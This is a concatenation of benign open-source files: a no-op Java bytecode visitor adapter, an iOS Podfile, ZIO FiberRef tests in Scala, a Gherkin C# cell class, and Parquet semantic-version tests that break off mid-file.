*/
@Override
public void _iload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_3(int)
*/
@Override
public void _iload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload(int, int)
*/
@Override
public void _iload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_imul(int)
*/
@Override
public void _imul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ineg(int)
*/
@Override
public void _ineg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_instanceof(int, int, IConstantPoolEntry)
*/
@Override
public void _instanceof(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokedynamic(int, int, IConstantPoolEntry, IConstantPoolEntry)
* @since 3.6
* @deprecated This has been replaced with {@link IBytecodeVisitor#_invokedynamic(int, int, IConstantPoolEntry)}
*/
@Override
public void _invokedynamic(
int pc,
int index,
IConstantPoolEntry nameEntry,
IConstantPoolEntry descriptorEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokedynamic(int, int, IConstantPoolEntry)
* @since 3.8
*/
@Override
public void _invokedynamic(
int pc,
int index,
IConstantPoolEntry invokeDynamicEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokeinterface(int, int, byte, IConstantPoolEntry)
*/
@Override
public void _invokeinterface(
int pc,
int index,
byte nargs,
IConstantPoolEntry constantInterfaceMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokespecial(int, int, IConstantPoolEntry)
*/
@Override
public void _invokespecial(
int pc,
int index,
IConstantPoolEntry constantMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokestatic(int, int, IConstantPoolEntry)
*/
@Override
public void _invokestatic(
int pc,
int index,
IConstantPoolEntry constantMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokevirtual(int, int, IConstantPoolEntry)
*/
@Override
public void _invokevirtual(
int pc,
int index,
IConstantPoolEntry constantMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ior(int)
*/
@Override
public void _ior(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_irem(int)
*/
@Override
public void _irem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ireturn(int)
*/
@Override
public void _ireturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ishl(int)
*/
@Override
public void _ishl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ishr(int)
*/
@Override
public void _ishr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_0(int)
*/
@Override
public void _istore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_1(int)
*/
@Override
public void _istore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_2(int)
*/
@Override
public void _istore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_3(int)
*/
@Override
public void _istore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore(int, int)
*/
@Override
public void _istore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_isub(int)
*/
@Override
public void _isub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iushr(int)
*/
@Override
public void _iushr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ixor(int)
*/
@Override
public void _ixor(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_jsr_w(int, int)
*/
@Override
public void _jsr_w(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_jsr(int, int)
*/
@Override
public void _jsr(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_l2d(int)
*/
@Override
public void _l2d(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_l2f(int)
*/
@Override
public void _l2f(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_l2i(int)
*/
@Override
public void _l2i(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ladd(int)
*/
@Override
public void _ladd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_laload(int)
*/
@Override
public void _laload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_land(int)
*/
@Override
public void _land(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lastore(int)
*/
@Override
public void _lastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lcmp(int)
*/
@Override
public void _lcmp(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lconst_0(int)
*/
@Override
public void _lconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lconst_1(int)
*/
@Override
public void _lconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldc_w(int, int, IConstantPoolEntry)
*/
@Override
public void _ldc_w(int pc, int index, IConstantPoolEntry constantPoolEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldc(int, int, IConstantPoolEntry)
*/
@Override
public void _ldc(int pc, int index, IConstantPoolEntry constantPoolEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldc2_w(int, int, IConstantPoolEntry)
*/
@Override
public void _ldc2_w(int pc, int index, IConstantPoolEntry constantPoolEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldiv(int)
*/
@Override
public void _ldiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_0(int)
*/
@Override
public void _lload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_1(int)
*/
@Override
public void _lload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_2(int)
*/
@Override
public void _lload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_3(int)
*/
@Override
public void _lload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload(int, int)
*/
@Override
public void _lload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lmul(int)
*/
@Override
public void _lmul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lneg(int)
*/
@Override
public void _lneg(int pc) {
// default behavior is to do nothing
}
/**
 * Visits a <code>lookupswitch</code> instruction; this adapter does nothing.
 *
 * @param pc the program counter (bytecode offset) of the instruction
 * @param defaultoffset branch offset taken when no pair matches
 * @param npairs the number of match/offset pairs that follow
 * @param offset_pairs the match/offset pairs; each entry pairs a key with its branch offset
 * @see IBytecodeVisitor#_lookupswitch(int, int, int, int[][])
 */
@Override
public void _lookupswitch(
	int pc,
	int defaultoffset,
	int npairs,
	int[][] offset_pairs) {
	// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lor(int)
*/
@Override
public void _lor(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lrem(int)
*/
@Override
public void _lrem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lreturn(int)
*/
@Override
public void _lreturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lshl(int)
*/
@Override
public void _lshl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lshr(int)
*/
@Override
public void _lshr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_0(int)
*/
@Override
public void _lstore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_1(int)
*/
@Override
public void _lstore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_2(int)
*/
@Override
public void _lstore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_3(int)
*/
@Override
public void _lstore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore(int, int)
*/
@Override
public void _lstore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lsub(int)
*/
@Override
public void _lsub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lushr(int)
*/
@Override
public void _lushr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lxor(int)
*/
@Override
public void _lxor(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_monitorenter(int)
*/
@Override
public void _monitorenter(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_monitorexit(int)
*/
@Override
public void _monitorexit(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_multianewarray(int, int, int, IConstantPoolEntry)
*/
@Override
public void _multianewarray(
int pc,
int index,
int dimensions,
IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_new(int, int, IConstantPoolEntry)
*/
@Override
public void _new(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_newarray(int, int)
*/
@Override
public void _newarray(int pc, int atype) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_nop(int)
*/
@Override
public void _nop(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_pop(int)
*/
@Override
public void _pop(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_pop2(int)
*/
@Override
public void _pop2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_putfield(int, int, IConstantPoolEntry)
*/
@Override
public void _putfield(int pc, int index, IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_putstatic(int, int, IConstantPoolEntry)
*/
@Override
public void _putstatic(
int pc,
int index,
IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ret(int, int)
*/
@Override
public void _ret(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_return(int)
*/
@Override
public void _return(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_saload(int)
*/
@Override
public void _saload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_sastore(int)
*/
@Override
public void _sastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_sipush(int, short)
*/
@Override
public void _sipush(int pc, short value) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_swap(int)
*/
@Override
public void _swap(int pc) {
// default behavior is to do nothing
}
/**
 * Visits a <code>tableswitch</code> instruction; this adapter does nothing.
 *
 * @param pc the program counter (bytecode offset) of the instruction
 * @param defaultoffset branch offset taken when the index is outside [low, high]
 * @param low the lowest index covered by the jump table
 * @param high the highest index covered by the jump table
 * @param jump_offsets branch offsets for each index from low to high, in order
 * @see IBytecodeVisitor#_tableswitch(int, int, int, int, int[])
 */
@Override
public void _tableswitch(
	int pc,
	int defaultoffset,
	int low,
	int high,
	int[] jump_offsets) {
	// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_wide(int, int, int, int)
*/
@Override
public void _wide(int pc, int iincopcode, int index, int _const) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_wide(int, int, int)
*/
@Override
public void _wide(int pc, int opcode, int index) {
// default behavior is to do nothing
}
/**
 * Visits the reserved <code>breakpoint</code> opcode; this adapter does nothing.
 * This opcode is reserved by the JVM specification for debugger use and should
 * not appear in valid class files.
 *
 * @param pc the program counter (bytecode offset) of the instruction
 * @see IBytecodeVisitor#_breakpoint(int)
 */
@Override
public void _breakpoint(int pc) {
	// default behavior is to do nothing
}
/**
 * Visits the reserved <code>impdep1</code> opcode; this adapter does nothing.
 * Reserved by the JVM specification for implementation-dependent back-end use.
 *
 * @param pc the program counter (bytecode offset) of the instruction
 * @see IBytecodeVisitor#_impdep1(int)
 */
@Override
public void _impdep1(int pc) {
	// default behavior is to do nothing
}
/**
 * Visits the reserved <code>impdep2</code> opcode; this adapter does nothing.
 * Reserved by the JVM specification for implementation-dependent back-end use.
 *
 * @param pc the program counter (bytecode offset) of the instruction
 * @see IBytecodeVisitor#_impdep2(int)
 */
@Override
public void _impdep2(int pc) {
	// default behavior is to do nothing
}
}
|
{
"pile_set_name": "Github"
}
|
# CocoaPods manifest for the Weather workspace.
# Spec repository and minimum deployment target.
source 'https://github.com/CocoaPods/Specs.git'
platform :ios, '8.0'
# Build pods as frameworks rather than static libraries.
use_frameworks!
# Dependencies of the main application target.
target :Weather do
  pod 'Swinject'
  pod 'Alamofire'
  pod 'ModelMapper'
  pod 'ASToast'
  pod 'RealmSwift'
end
# Dependencies of the unit-test target; Quick/Nimble are pinned to exact versions.
target :WeatherTests do
  pod 'Quick', '1.1'
  pod 'Nimble', '6.1'
  pod 'Swinject'
  pod 'RealmSwift'
end
|
{
"pile_set_name": "Github"
}
|
package zio
import zio.FiberRefSpecUtil._
import zio.duration._
import zio.test.Assertion._
import zio.test.TestAspect._
import zio.test._
import zio.test.environment.Live
object FiberRefSpec extends ZIOBaseSpec {
import ZIOTag._
def spec: ZSpec[Environment, Failure] = suite("FiberRefSpec")(
suite("Create a new FiberRef with a specified value and check if:")(
testM("`get` returns the current value") {
for {
fiberRef <- FiberRef.make(initial)
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
},
testM("`get` returns the current value for a child") {
for {
fiberRef <- FiberRef.make(initial)
child <- fiberRef.get.fork
value <- child.join
} yield assert(value)(equalTo(initial))
},
testM("`getAndUpdate` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.getAndUpdate(_ => update)
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(update))
},
testM("`getAndUpdateSome` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.getAndUpdateSome { case _ =>
update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(update))
},
testM("`getAndUpdateSome` not changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.getAndUpdateSome {
case _ if false => update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(initial))
},
testM("`locally` restores original value") {
for {
fiberRef <- FiberRef.make(initial)
local <- fiberRef.locally(update)(fiberRef.get)
value <- fiberRef.get
} yield assert(local)(equalTo(update)) && assert(value)(equalTo(initial))
},
testM("`locally` restores parent's value") {
for {
fiberRef <- FiberRef.make(initial)
child <- fiberRef.locally(update)(fiberRef.get).fork
local <- child.join
value <- fiberRef.get
} yield assert(local)(equalTo(update)) && assert(value)(equalTo(initial))
},
testM("`locally` restores undefined value") {
for {
child <- FiberRef.make(initial).fork
// Don't use join as it inherits values from child.
fiberRef <- child.await.flatMap(ZIO.done(_))
localValue <- fiberRef.locally(update)(fiberRef.get)
value <- fiberRef.get
} yield assert(localValue)(equalTo(update)) && assert(value)(equalTo(initial))
},
testM("`modify` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.modify(_ => (1, update))
value2 <- fiberRef.get
} yield assert(value1)(equalTo(1)) && assert(value2)(equalTo(update))
},
testM("`modifySome` not changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.modifySome(2) {
case _ if false => (1, update)
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(2)) && assert(value2)(equalTo(initial))
},
testM("`set` updates the current value") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update)
value <- fiberRef.get
} yield assert(value)(equalTo(update))
},
testM("`set` by a child doesn't update parent's value") {
for {
fiberRef <- FiberRef.make(initial)
promise <- Promise.make[Nothing, Unit]
_ <- (fiberRef.set(update) *> promise.succeed(())).fork
_ <- promise.await
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
},
testM("`updateAndGet` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.updateAndGet(_ => update)
value2 <- fiberRef.get
} yield assert(value1)(equalTo(update)) && assert(value2)(equalTo(update))
},
testM("`updateSomeAndGet` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.updateSomeAndGet { case _ =>
update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(update)) && assert(value2)(equalTo(update))
},
testM("`updateSomeAndGet` not changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.updateSomeAndGet {
case _ if false => update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(initial))
},
testM("its value is inherited on join") {
for {
fiberRef <- FiberRef.make(initial)
child <- fiberRef.set(update).fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(update))
},
testM("initial value is always available") {
for {
child <- FiberRef.make(initial).fork
fiberRef <- child.await.flatMap(ZIO.done(_))
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
},
testM("its value is inherited after simple race") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update1).race(fiberRef.set(update2))
value <- fiberRef.get
} yield assert(value)(equalTo(update1)) || assert(value)(equalTo(update2))
},
testM("its value is inherited after a race with a bad winner") {
for {
fiberRef <- FiberRef.make(initial)
badWinner = fiberRef.set(update1) *> ZIO.fail("ups")
goodLoser = fiberRef.set(update2) *> looseTimeAndCpu
_ <- badWinner.race(goodLoser)
value <- fiberRef.get
} yield assert(value)(equalTo(update2))
},
testM("its value is not inherited after a race of losers") {
for {
fiberRef <- FiberRef.make(initial)
loser1 = fiberRef.set(update1) *> ZIO.fail("ups1")
loser2 = fiberRef.set(update2) *> ZIO.fail("ups2")
_ <- loser1.race(loser2).ignore
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
} @@ zioTag(errors),
testM("the value of the loser is inherited in zipPar") {
for {
fiberRef <- FiberRef.make(initial)
latch <- Promise.make[Nothing, Unit]
winner = fiberRef.set(update1) *> latch.succeed(()).unit
loser = latch.await *> fiberRef.set(update2) *> looseTimeAndCpu
_ <- winner.zipPar(loser)
value <- fiberRef.get
} yield assert(value)(equalTo(update2))
} @@ zioTag(errors),
testM("nothing gets inherited with a failure in zipPar") {
for {
fiberRef <- FiberRef.make(initial)
success = fiberRef.set(update)
failure1 = fiberRef.set(update1) *> ZIO.fail(":-(")
failure2 = fiberRef.set(update2) *> ZIO.fail(":-O")
_ <- success.zipPar(failure1.zipPar(failure2)).orElse(ZIO.unit)
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
} @@ zioTag(errors),
testM("fork function is applied on fork - 1") {
def increment(x: Int): Int = x + 1
for {
fiberRef <- FiberRef.make(initial = 0, fork = increment)
child <- ZIO.unit.fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(1))
},
testM("fork function is applied on fork - 2") {
def increment(x: Int): Int = x + 1
for {
fiberRef <- FiberRef.make(initial = 0, fork = increment)
child <- ZIO.unit.fork.flatMap(_.join).fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(2))
},
testM("join function is applied on join - 1") {
for {
fiberRef <- FiberRef.make(initial = 0, join = math.max)
child <- fiberRef.update(_ + 1).fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(1))
},
testM("join function is applied on join - 2") {
for {
fiberRef <- FiberRef.make(initial = 0, join = math.max)
child <- fiberRef.update(_ + 1).fork
_ <- fiberRef.update(_ + 2)
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(2))
},
testM("its value is inherited in a trivial race") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update).raceAll(Iterable.empty)
value <- fiberRef.get
} yield assert(value)(equalTo(update))
},
testM("the value of the winner is inherited when racing two ZIOs with raceAll") {
for {
fiberRef <- FiberRef.make(initial)
latch <- Promise.make[Nothing, Unit]
winner1 = fiberRef.set(update1) *> latch.succeed(())
loser1 = latch.await *> fiberRef.set(update2) *> looseTimeAndCpu
_ <- loser1.raceAll(List(winner1))
value1 <- fiberRef.get <* fiberRef.set(initial)
winner2 = fiberRef.set(update1)
loser2 = fiberRef.set(update2) *> ZIO.fail(":-O")
_ <- loser2.raceAll(List(winner2))
value2 <- fiberRef.get <* fiberRef.set(initial)
} yield assert((value1, value2))(equalTo((update1, update1)))
} @@ flaky,
testM("the value of the winner is inherited when racing many ZIOs with raceAll") {
for {
fiberRef <- FiberRef.make(initial)
n = 63
latch <- Promise.make[Nothing, Unit]
winner1 = fiberRef.set(update1) *> latch.succeed(())
loser1 = latch.await *> fiberRef.set(update2) *> looseTimeAndCpu
losers1 = Iterable.fill(n)(loser1)
_ <- winner1.raceAll(losers1)
value1 <- fiberRef.get <* fiberRef.set(initial)
winner2 = fiberRef.set(update1) *> looseTimeAndCpu
loser2 = fiberRef.set(update2) *> ZIO.fail("Nooooo")
losers2 = Iterable.fill(n)(loser2)
_ <- winner2.raceAll(losers2)
value2 <- fiberRef.get <* fiberRef.set(initial)
} yield assert((value1, value2))(equalTo((update1, update1)))
},
testM("nothing gets inherited when racing failures with raceAll") {
for {
fiberRef <- FiberRef.make(initial)
loser = fiberRef.set(update) *> ZIO.fail("darn")
_ <- loser.raceAll(Iterable.fill(63)(loser)).orElse(ZIO.unit)
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
} @@ zioTag(errors),
testM("an unsafe handle is initialized and updated properly") {
for {
fiberRef <- FiberRef.make(initial)
handle <- fiberRef.unsafeAsThreadLocal
value1 <- UIO(handle.get())
_ <- fiberRef.set(update1)
value2 <- UIO(handle.get())
_ <- UIO(handle.set(update2))
value3 <- fiberRef.get
} yield assert((value1, value2, value3))(equalTo((initial, update1, update2)))
},
testM("unsafe handles work properly when initialized in a race") {
for {
fiberRef <- FiberRef.make(initial)
initHandle = fiberRef.unsafeAsThreadLocal
handle <- ZIO.raceAll(initHandle, Iterable.fill(64)(initHandle))
value1 <- UIO(handle.get())
doUpdate = fiberRef.set(update)
_ <- ZIO.raceAll(doUpdate, Iterable.fill(64)(doUpdate))
value2 <- UIO(handle.get())
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(update))
},
testM("unsafe handles work properly when accessed concurrently") {
for {
fiberRef <- FiberRef.make(0)
setAndGet =
(value: Int) => setRefOrHandle(fiberRef, value) *> fiberRef.unsafeAsThreadLocal.flatMap(h => UIO(h.get()))
n = 64
fiber <- ZIO.forkAll(1.to(n).map(setAndGet))
values <- fiber.join
} yield assert(values)(equalTo(1.to(n)))
},
testM("unsafe handles don't see updates from other fibers") {
for {
fiberRef <- FiberRef.make(initial)
handle <- fiberRef.unsafeAsThreadLocal
value1 <- UIO(handle.get())
n = 64
fiber <- ZIO.forkAll(Iterable.fill(n)(fiberRef.set(update).race(UIO(handle.set(update)))))
_ <- fiber.await
value2 <- UIO(handle.get())
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(initial))
},
testM("unsafe handles keep their values if there are async boundaries") {
for {
fiberRef <- FiberRef.make(0)
test = (i: Int) =>
for {
handle <- fiberRef.unsafeAsThreadLocal
_ <- setRefOrHandle(fiberRef, handle, i)
_ <- ZIO.yieldNow
value <- UIO(handle.get())
} yield assert(value)(equalTo(i))
n = 64
results <- ZIO.reduceAllPar(test(1), 2.to(n).map(test))(_ && _)
} yield results
},
testM("calling remove on unsafe handles restores their initial values") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update)
handle <- fiberRef.unsafeAsThreadLocal
_ <- UIO(handle.remove())
value1 <- fiberRef.get
value2 <- UIO(handle.get())
} yield assert((value1, value2))(equalTo((initial, initial)))
}
)
)
}
object FiberRefSpecUtil {
  // Distinct sentinel strings shared by the FiberRefSpec tests.
  val (initial, update, update1, update2) = ("initial", "update", "update1", "update2")
  // Repeatedly yields and sleeps (101 iterations of yieldNow <* sleep(1 nano))
  // so that other, racing fibers get a chance to run before this effect completes.
  val looseTimeAndCpu: ZIO[Live, Nothing, Unit] = Live.live {
    (ZIO.yieldNow <* clock.sleep(1.nano)).repeatN(100)
  }
  // Sets the FiberRef either directly (even values) or through its unsafe
  // ThreadLocal view (odd values), so both write paths get exercised.
  def setRefOrHandle(fiberRef: FiberRef[Int], value: Int): UIO[Unit] =
    if (value % 2 == 0) fiberRef.set(value)
    else fiberRef.unsafeAsThreadLocal.flatMap(h => UIO(h.set(value)))
  // Same parity-based dispatch, but reuses an already-obtained ThreadLocal handle.
  def setRefOrHandle(fiberRef: FiberRef[Int], handle: ThreadLocal[Int], value: Int): UIO[Unit] =
    if (value % 2 == 0) fiberRef.set(value)
    else UIO(handle.set(value))
}
|
{
"pile_set_name": "Github"
}
|
namespace Gherkin.Pickles
{
    /// <summary>
    /// A single cell of a pickle table row: the cell text together with the
    /// location it originated from in the source document. Immutable after
    /// construction.
    /// </summary>
    public class PickleCell
    {
        /// <summary>Source location the cell text came from.</summary>
        public PickleLocation Location { get; private set; }

        /// <summary>Text content of the cell.</summary>
        public string Value { get; private set; }

        /// <summary>Creates a cell from its source location and text content.</summary>
        public PickleCell(PickleLocation location, string value)
        {
            this.Value = value;
            this.Location = location;
        }
    }
}
|
{
"pile_set_name": "Github"
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.parquet;
import org.junit.Test;
import java.util.Arrays;
import java.util.List;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
/**
 * Unit tests for {@link SemanticVersion}: numeric component ordering,
 * semver pre-release/build-metadata precedence, and string parsing.
 */
public class SemanticVersionTest {
  @Test
  public void testCompare() {
    // patch component: reflexive, less-than, greater-than
    // (the original test repeated these three assertions verbatim; the duplicates were removed)
    assertTrue(new SemanticVersion(1, 8, 1).compareTo(new SemanticVersion(1, 8, 1)) == 0);
    assertTrue(new SemanticVersion(1, 8, 0).compareTo(new SemanticVersion(1, 8, 1)) < 0);
    assertTrue(new SemanticVersion(1, 8, 2).compareTo(new SemanticVersion(1, 8, 1)) > 0);
    // minor component
    assertTrue(new SemanticVersion(1, 7, 0).compareTo(new SemanticVersion(1, 8, 0)) < 0);
    assertTrue(new SemanticVersion(1, 9, 0).compareTo(new SemanticVersion(1, 8, 0)) > 0);
    // major component
    assertTrue(new SemanticVersion(0, 0, 0).compareTo(new SemanticVersion(1, 0, 0)) < 0);
    assertTrue(new SemanticVersion(2, 0, 0).compareTo(new SemanticVersion(1, 0, 0)) > 0);
    // a more significant component always outweighs a less significant one
    assertTrue(new SemanticVersion(1, 8, 100).compareTo(new SemanticVersion(1, 9, 0)) < 0);
    // versions flagged "unknown" sort below the equivalent known version
    assertTrue(new SemanticVersion(1, 8, 0).compareTo(new SemanticVersion(1, 8, 0, true)) > 0);
    assertTrue(new SemanticVersion(1, 8, 0, true).compareTo(new SemanticVersion(1, 8, 0, true)) == 0);
    assertTrue(new SemanticVersion(1, 8, 0, true).compareTo(new SemanticVersion(1, 8, 0)) < 0);
  }

  @Test
  public void testSemverPrereleaseExamples() throws Exception {
    // precedence examples from the semver spec, in strictly ascending order
    List<String> examples = Arrays.asList("1.0.0-alpha", "1.0.0-alpha.1",
        "1.0.0-alpha.beta", "1.0.0-beta", "1.0.0-beta.2", "1.0.0-beta.11",
        "1.0.0-rc.1", "1.0.0");
    for (int i = 0; i < examples.size() - 1; i += 1) {
      assertLessThan(examples.get(i), examples.get(i + 1));
      assertEqualTo(examples.get(i), examples.get(i));
    }
    // the last one didn't get reflexively tested
    assertEqualTo(examples.get(examples.size() - 1), examples.get(examples.size() - 1));
  }

  @Test
  public void testSemverBuildInfoExamples() throws Exception {
    // build metadata (the "+..." suffix) must be ignored for precedence
    assertEqualTo("1.0.0-alpha+001", "1.0.0-alpha+001");
    assertEqualTo("1.0.0-alpha", "1.0.0-alpha+001");
    assertEqualTo("1.0.0+20130313144700", "1.0.0+20130313144700");
    assertEqualTo("1.0.0", "1.0.0+20130313144700");
    assertEqualTo("1.0.0-beta+exp.sha.5114f85", "1.0.0-beta+exp.sha.5114f85");
    assertEqualTo("1.0.0-beta", "1.0.0-beta+exp.sha.5114f85");
  }

  @Test
  public void testUnknownComparisons() throws Exception {
    // anything with unknown is lower precedence
    assertLessThan("1.0.0rc0-alpha+001", "1.0.0-alpha");
  }

  @Test
  public void testDistributionVersions() throws Exception {
    // vendor-style pre-release tags compare component-wise
    assertEqualTo("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.0");
    assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.1");
    assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.1-SNAPSHOT");
    assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.6.0");
    assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh6.0.0");
    assertLessThan("1.5.0-cdh5.5.0", "1.5.0");
    // according to the semver spec, this is true :(
    assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.0-SNAPSHOT");
  }

  @Test
